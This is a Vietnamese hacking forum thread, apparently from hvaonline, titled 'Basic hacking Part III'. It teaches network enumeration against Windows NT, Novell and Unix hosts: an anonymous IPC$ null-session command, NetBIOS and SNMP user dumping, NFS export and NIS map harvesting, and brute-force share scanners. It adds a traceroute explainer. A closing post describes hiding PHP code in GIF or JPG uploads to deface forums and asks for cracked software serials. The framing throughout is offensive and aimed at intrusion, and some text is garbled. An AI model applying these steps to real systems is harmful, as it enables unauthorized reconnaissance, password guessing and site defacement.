Hầu hết các kỹ thuật thu thập thông tin mà tôi mô tả trong phần này đều vận dụng một thiếu sót về bảo mật của winNT là cho phép các người dùng nặc danh( anonymous user ) kết nồi và điểm danh một số tài nguyên nhất định mà không cần sự "cho phép" . Chỗ yếu này được biết đến với cái tên "Red Button"( hiii, chắc là nút login hay submit quá ), tuyến nối phiên làm việc rỗng hay đăng nhập nặc danh.....và nó vẫn là chỗ đứng có tiềm năng tàn phá nhất trên mạng mà hacker tìm kiếm. Tôi nhớ có một bài viết lưu truyền khá rộng rãi trên mạng với tiêu đề rất "ghê" là " hướng dẫn deface một trang web" trong đó hướng dẫn cách dò tìm chỗ yếu anonymous user và khai thác nó !
Để thực hiện một tuyến nối phiên làm việc rỗng, ta dùng cú pháp:
C:\> net use \\IP\IPC$ ''''''' /user:'''''
Cú pháp trên nối "phần dùng chung" truyền thông tin xử lý ẩn (IPC$) tại địa chỉ IP mà ta cung cấp dưới dạng người dùng nặc danh là [user:''''] và một mật hiệu rỗng [''''''']. Nếu thành công, ta có thể có một lệnh mở để sử dụng những kỹ thuật khác nhau nhằm "thu gom" càng nhiều thông tin càng tốt : thông tin mạng , các phần dùng chung, các người dùng , các nhóm , các khóa Registry..... Phương pháp chống NT toàn cục sẽ được nêu trong "basic security" của fantomas311 - mời bạn đón xem

*** Các phần dùng chung NetBIOS ***

Sau khi thiết lập một phiên làm việc rỗng, ta cũng có thể dùng lại lệnh net view để điểm danh các phần dùng chung trên hệ thống từ xa.
Ba công cụ điểm danh các phần dùng chung khác trong NTRK là rmtshare , srvcheck và srvinfo
Một trong các công cụ thích hợp nhất để điểm danh các tệp dùng chung NT( và các nội dung khác là Dump ACL .Download free tại http://38.15.19.115 Dump ACL kiểm toán mọi thứ, từ giấy phép hệ tập tin đến các dịch vụ sẵn dùng trên các hệ thống từ xa. Thậm chí nó còn có thể lấy thông tin người dùng cơ bản qua một tuyến nối rỗng vô hại, và có thể chạy từ dòng lệnh, tạo thuận lợi cho việc lập ký mã và tự động hóa.
Việc mở các tuyến nối rỗng và dùng các công cụ trên đây theo thủ công là một phương pháp tuyệt vời cho các cuộc tấn công có định hướng, nhưng hầu hết các hacker thường sử dụng một bộ quét NetBIOS để nhanh chóng kiểm tra nguyên cả mạng để tìm các tệp dùng chung phơi bày. Một trong các công cụ phổ dụng đó là Legion ( có thể tìm thấy trên nhiều kho tàng trữ internet ). Legion có thể nghiền ngẫm qua một mạng IP Class C và tiết lộ tất cả các tệp dùng chung sẵn dùng trong giao diện đồ họa của nó. Phiên bản 2.1 có gộp một "công cụ cưỡng bức", công cụ này sẽ cố gắng nối kết với một tệp dùng chung nhất định thông qua một danh sách các mật hiệu do người dùng cung cấp. Cách bẻ khóa cưỡng bức đối với Win9x và WinNT sẽ được nêu cụ thể ở các phần sau
Một bộ quét tệp dùng chung windows phổ dụng khác là NetBIOS Auditing Tool (NAT) có thể tìm thấy trên các kho tàng trữ internet

****Các kiểu điểm danh NT khác ****

Ngoài ra còn có một số bộ điểm danh thông tin mạng NT khác như : epdump của Microsoft ( http://www.ntshop.net/security/tools/def.htm ), getmac và netdom trong NTRK và netviewx ( http://www.ibt.ku.dk/jesper/NTtools/ ) epdump truy vấn bộ ánh xạ điểm cuối RPC và nêu các dịch vụ kết gán với các địa chỉ IP và các số hiệu cổng. Dùng phiên làm việc rỗng, get mac hiển thị các địa chỉ MAC và các thiết bị của các card giao tiếp mạng trên các máy từ xa. Điều này cung cấp các thông tin hữu ích giúp hacker định hình một hệ thống có nhiều giao diện trên mạng . netdom còn hữu ích hơn điểm danh các thông tin chính về các domain NT trên tuyến, bao gồm tư cách thành viên domain và các danh xưng của Backup Domain Controllers . netviewx thường được dùng để dò tìm NT Remote Access Services ( RAS ) đề thu được khái niệm về số lượng các hệ phục vụ quay số tồn tại trên mạng
Cuối cùng, quả thật đáng trách nếu không đề cập đến SNMP ( Simple Network Management Protocol ) như một nguồn thông tin NT tuyệt vời.SNMP sẽ được đề cập chi tiết hơn trong phần tiếp theo: kỹ thuật điểm danh người dùng ( user ) trong WinNT

+++ Điểm danh người dùng và nhóm ( user and group ) trong WinNT

Trước khi đề cập đến điểm danh người dùng như thế nào , hãy nói đến công cụ cần dùng cho kỹ thuật này .Sau khi định danh một danh sách user , hacker có thể sử dụng các công cụ đoán pass tự động ( brute force ). Cũng như trường hợp của các tệp dùng chung, các máy NT config sai dễ dàng phun ra các thông tin user
Một lần nữa, ta sẽ dùng tuyến nối rỗng để cung cấp khả năng truy cập ban đầu để chạy các công cụ hacking đã biết . cách đầu tiên và đơn giản nhất để định danh các user trên một hệ thống windows từ xa là dùng lệnh nbstat

C:\> nbstat -A [IP]

Kỹ thuật này cho ta nội dung bảng tên NetBIOS của hệ thống từ xa, nêu tên hệ thống, domai mà nó đang ở trong đó , và những user đã đăng nhập .
Có vài công cụ NTRK khác có thể cung cấp thông tin về các user ( dù có tuyến nối rỗng hay không ) chẳng hạn như các trình tiện ích usrstat , showgrps, local, global nhưng công cụ thông dụng để lấy thông tin của user nhất vẫn là DumpACL. DumpACL có thể kéo một danh sách các người dùng, các nhóm, và các quyền user của hệ thống NT.
Ngoài ra, hai công cụ điểm danh NT khác cũng khá mạnh là user2sid và sid2user của Evgenii Rudnyi ( xem http://www.chem.msu.sn:8080~rudnyi/NT/sid.txt ) muốn sử dụng tốt hai công cụ này cần phải có thời gian tìm hiểu. Tôi chỉ có thể nói là nó có thể làm việc ngay cả khi các quản trị mạng đã kích hoạt RestrictAnonymous , chỉ cần có thề truy cập port 139 !

****SNMP (Simple Network Management Protocol )****

Một hệ thống NT đang chạy các tác nhân NT SNMP có thể truy cập bằng các chuỗi cộng đồng ngầm định như "public".Việc điểm danh các user NT thông qua SNMP là một điều dễ dàng khi dùng trình duyệt SNMP snmputil trong NTRK.Tuy nhiên, công cụ này lại cung cấp rất nhiều số liệu được coi là "lùng bùng, khó nhớ, khó hiểu".Do đó, để tránh rắc rối ( hacking có quá nhiều rắc rối phải giải quyết rồi !!!) bạn có thể sử dụng trình duyệt SNMP của solar wind tên là IP network browser tại http://solarwinds.net . Trên đây là phần trình bày của fantomas311 về điểm danh WinNT , tiếp theo là điểm danh với Novell
__________________


********* NOVELL *********

Tuy nói WinNT là bạn của các "phiên làm việc rỗng" nhưng netware của Novell cũng gặp sự cố tương tự :

+++ Network Neighborhood smilieùng Network Neighborhood để tìm hiểu về các hệ phục vụ và các "cây" sẵn dùng trên đường truyền .Bước này không đe dọa trực tiếp thông tin, nó chỉ như một bước khởi động đơn giản mà thôi, làm được gì thì hay cái nấy !!

+++ Các tuyến nối Novell Client32

Chương trình Netware Services của Novell chạy trong khay hệ thống và cho phép quản lý các tuyến nối Netware của bạn thông qua tùy chọn Netware Connections khả năng này có thể cực kỳ quý giá trong việc quản lý các gắn kết và các đợt đăng nhập .Tuy nhiên, quan trọng hơn là sau khi tạo một mối gắn kết (attachment ), bạn có thể truy lục cậy NDS chứa hệ phục vụ, số hiệu tuyến nối, và địa chỉ mạng hoàn chỉnh.Điều này có thể hữu ích cho việc nối với hệ phục vụ về sau và giành quyền ưu tiên cấp điều hành (admin)

+++On-site Admin : Xem các hệ phục vụ Novell

Nếu không có tiến trình thẩm định quyền theo một hệ phục vụ đơn lẻ, bạn có thể dùng sản phẩm On-site Admin của Novell ( ftp://ftp.cdrom.com ) để xem tình trạng của mọi hệ phục vụ trên đường truyền.Thay vì gửi các yêu cầu quảng bá riêng, On-Site Admin dường như hiển thị các hệ phục vụ được Network Neighborhood lập cache, gửi các đợt quảng bá định kỳ riêng về các hệ phục vụ Novell trên mạng

+++On-site Admin duyệt cây :

Ta có thể duyệt hầu hết các cây Novell bằng On-site Admin. Trong trường hợp này , Client32 thực tế gắn kết với hệ phục vụ đã lựa bên trong cây. Lý do đó là theo ngầm định, Netware 4.x cho phép mọi người duyệt cây.Bạn có thể giảm thiểu điều này bằng cách bổ sung tính năng lọc các quyền thừa kế vào gốc cây. Những thông tin thu được quan On-Site Admin có thể giúp ta chuyển sang cuộc đột nhập hệ thống chủ động. Điểm danh NT kết thúc ở đây !!!!

******* UNIX *******

Hầu hết các thực thể Unix hiện đại đều dựa trên các tính năng nối mạng TCP/IP chuẩn và do đó không dễ gì công khai thông tin thoải mái như NT thông qua các giao diện NetBIOS hoặc NetWare .Tất nhiên, điều đó không có nghĩa là Unix không bị các kỹ thuật điểm danh tấn công, nhưng kỹ thuật nào sẽ cho ra các kết quả tốt nhất ??? Điều đó còn tùy thuộc vào cách cấu hình hệ thống. Ví dụ như Remote Procedure Call (RPC) , Network Information System (NIS) và Network File System (NFS) của Sun Microsystem nhắm đến trong nhiều năm qua. Ta sẽ đề cập đến một số kỹ thuật cổ điển ngay sau đây.
Trước khi đi tiếp, bạn nên nhớ rằng hầu hết các kỹ thuật mô tả trong part III này đều dùng các thông tin thu thập được từ các kỹ đợt quét cổng và kỹ thuật điểm danh OS đã nêu trong "basic hacking Part I và II"
+++Điểm danh tệp dùng chung và tài nguyên mạng Unix
Nguồn thông tin mạng Unix tốt nhất là những kỹ thuật TCP/IP đã mô tả trong Part II, nhưng một công cụ tuyệt vời hơn để đào sâu chính là trình tiện ích Unix showmount rất hữu ích trong việc điểm danh các hệ tập tin xuất khẩu NFS trên một mạng. Ví dụ : giả sử một đợt quét trước đó cho biết cổng 2049 (NFS) đang lắng chờ trên một đích tiềm năng . Như vậy, ta có thể dùng showmount để xem một cách chính xác các thư mục đang được share ra sao :

showmount -e 192.168.202.34
export list for 192.168.202.34
/pub (everyone)
/var (everyone)
/usr (user)

Khóa chuyển -e nêu danh sách xuất khẩu của hệ phục vụ NFS, đáng tiếc cho các nhà bảo mật ,và mừng cho hacker là lỗ rò rĩ thông tin này không thể nà bịt kín được , bởi đây là cách ứng xử ngầm định của NFS
NFS không là phần mềm chia sẻ tập tin duy nhất mà bạn tìm thấy trên Unix , nhờ tính phổ dụng ngày càng tăng của bộ phần mềm sampa nguồn mở, cung cấp các dịch vụ tập tin và in trôi chảy cho các hệ khách SMB (Server Message Block )tạo thành nền móng của tính năng nối mạng windows .Samba có thể download tại http://samba.org và được phân phối cùng với nhiều bộ Linux.Mặc dù tập tin cấu hình hệ phục vụ Samba (/etc/smb.conf) có một số tham số bảo mật dể hiểu, việc cấu hình sai vẫn có thể dẫn đến các tập tin dùng chung mạng không được bảo vệ.
Một nguồn tiềm năng khác về thông tin mạng của Unix là NIS.Sự cố chính với NIS là một khi biết được tên domain NIS của một hệ phục vụ, bạn có thể dùng một đợt truy vấn RPC đơn giản để thu thập bất kỳ bản ánh xạ NIS nào của nó. Các bản ánh xạ NIS là những phép ánh xạ phân phối thông tin quan trọng của từng hệ chủ domain chẳng hạn như nội dung tập tin passwd . Kiểu tấn công NIS truyền thống thường dùng các công cụ khách NIS để cố gắng đoán tên domain.
Ngoài ra, còn một số công cụ khai thác cũng khá hữu ích là psean và snmpwalk
+++Điểm danh người dùng và các nhóm Unix :Kỹ thuật này không thu được những thông tin thật quý giá, nó chỉ có thể cho bạn biết user nào là root trong hệ phục vụ đích. Công cụ : finger , rusers , rwho

****** Basic hacking Part III tạm dừng ở đây, sau ba bước cơ bản, bạn đã có khá nhiều thông tin và công cụ, khai thác cụ thể sẽ hướng dẫn sau .... Hy vọng qua ba bài viết, fantomas311 đã đem lại cho bạn khái niệm cơ bản về hacking ! Chúc vui ! Mọi chi tiết về bài viết xin liên hệ fantomas311@yahoo.com ******

Fantomas311 - Vietnamsecurity Team

Thân !
__________________


Trong bài viết trên tôi đã đề cập đến traceroute. Vậy Traceroute là gì ?? Mời các bạn xem bài viết sau:

Traceroute là gì?

Traceroute là một chương trình cho phép bạn xác định được đường đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.

Một ví dụ về Traceroute!

Traceroute có thể làm được gì? Bạn hãy xem ví dụ sau sẽ rõ!

C:\windows>tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắt xích) trên mạng. Đây là đưòng đi của các gói packets:

Netzero(ISP đã gởi dữ liệu đi) -> Spectranet (một nhà công cấp mạng xương sống - Backbone Provider) -> New York ISP -> New York Backbone -> Asia -> South Asia -> India Backbone -> New Delhi Backbone -> một router khác trong New Delhi Backbone -> New Delhi ISP

Như vậy, host có địa chỉ ip 203.94.12.54 nằm ở New Delhi, India, South Asia! Bạn cũng có thể telnet đến 203.94.12.54 trên cổng 13(datetime) để xác định giờ GMT qua đó bạn có thể biết được vị trí của host này(yêu cầu là host 203.94.12.54 phải chạy daemon datetime và được định cấu hình đúng về thời gian)!

Traceroute hoạt động như thế nào?

Trước hết, bạn cần biết về ICMP, TTL và cách làm việc của các routers(bộ định tuyến)!

Những kiến thức cơ bản

ICMP - Internet Control Message Protocol. ICMP được dùng để thông báo các lỗi xảy ra trong quá trình truyền đi của các gói dữ liệu trên mạng. ICMP thuộc tầng vận huyển - Transpoort Layer! Tầng ứng dụng HTTP FTP Telnet Finger SSH DNS
POP3/IMAP SMTP Gopher BGP
Time/NTP Whois TACACS+ SSL DNS SNMP RIP
RADIUS Archie
Traceroute tftp Ping
Tầng vận chuyển
TCP


UDP


ICMP


OSPF


Tầng Internet
IP


ARP


Tầng vật lí Ethernet/802.3 Token Ring (802.5) SNAP/802.2 X.25 FDDI ISDN
Frame Relay SMDS ATM Wireless (WAP, CDPD, 802.11)
Fibre Channel DDS/DS0/T-carrier/E-carrier SONET/SDH DWDM
PPP HDLC SLIP/CSLIP xDSL Cable Modem (DOCSIS)

Tất cả các ICMP messages đều được chuyển đi cùng với các IP datagrams. Mỗi ICMP message được gói trong IP datagram sẽ có dạng như sau:

+---------------------+-------------------------+
| IP Header(20 bytes) | ICMP message (32 bytes) |
+---------------------+-------------------------+

Sau đây là cấu trúc của một IMCP message: (tham khảo RFC792 để biết thêm!)

0 7 8 15 16 31
+-----------------+-----------------+-----------------+
| Type (0 or 8) | Code (0) | 16-bit Checksum |
+-----------------+-----------------+-----------------+
| Indentifier | sequence number |
+-----------------+-----------------+-----------------+
| |
| Optional Data (nội dung tùy thuộc vào Type và Code) |
| |
+-----------------------------------------------------+

trường type có 15 giá trị khác nhau, tùy thuộc vào từng loại ICMP error message cụ thể. Ví dụ type=3 để chỉ định cho thông báo lỗi "Không đến được đích" - "Destination unreachable" error message!
trường code = sub-error dùng để xác định chính xác lỗi đã xảy ra. Ví dụ, type=3 và code=0 nghĩa là "Network Unreachable"(không đến được mạng); nếu type=3, code=1 nghĩa là "Host Unreachable"(không đến được host)...
TTL - Time to Live. TTL là một trường 8 bit trong IP header(bạn hãy xem lại cấu trúc của IP header!). TTL là thời gian gói dữ liệu tồn tại trên mạng trước khi nó bị bỏ qua. Người gởi dữ liệu đi sẽ xác định một giá trị TTL trước, thường là từ 32 -> 64. Giá trị này sẽ được giảm đi một khi một khi được chuyển qua một bộ định tuyến trên mạng. Khi giá trị này bằng 0, datagram này sẽ bị bỏ qua và giao thức ICMP sẽ báo lỗi về cho người gởi. Điều này sẽ tránh cho datagram này đi vào một vòng lặp vô tận qua các bộ định tuyến.

Mỗi bộ định tuyến khi nhận được IP datagram sẽ giảm giá trị TTL của datagram này đi một. Hầu hết các bộ định tuyến đều không giữ lại datagram này trong thời gian quá 1 giây trước khi chuyển datagram này đi. Nên giá trị TTL có thể coi bằng hop(counter) = số bộ định tuyến mà datagram này vừa vượt qua.

Khi bộ định tuyến nhận được một datagram có trường TTL bằng 0 hoặc 1, nó sẽ không chuyển datagram này đi tiếp. Thay vào đó, nó sẽ bỏ qua datagram này và gởi một ICMP message "Time Exceeded"(quá thời gian) trở lại cho người đã gởi datagram này! Vì ICMP message mà bộ định tuyến gởi trở lại cho người gởi có địa chỉ nguồn - source address là địa chỉ ip của bộ định tuyến này nên người gởi có thể biết được địa chỉ ip của router này!
__________________
Thì chèn PHP code vào tập tin *.gif hoặc file *.jpg
nhưng còn phải tuỳ thuộc diễn đàn đó có bug ko đã và bug như thế nào mới dùng được

khi nhúng php code vào gif hoặc jpg thì nên tự thiết kế lấy để vừa có thể xem được hình trong khi code php vẫn nhúng ở trong
Khi muốn nhúng code vào trong file Gif , JPG thì tốt nhất nên mở file GIF và JPG bằng Edit Plus <----đây là tool Edit tuyệt vời nhất và được hacker ưa chuộng nhất nó chỉ có một nhược điểm duy nhất là chưa hỗ trợ Unicode có thể tôi nhầm vì tôi đang dùng bản khá cũ rồi các bạn thử tải bản mới xem và nhớ share cho anh em Số Seri Crack nhé .

Các bạn có thể xem lại toàn bộ file video kỹ thuật Deface bằng 1 file *.gif
Download video tại đây
http://video.antichat.org/file37.html







 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|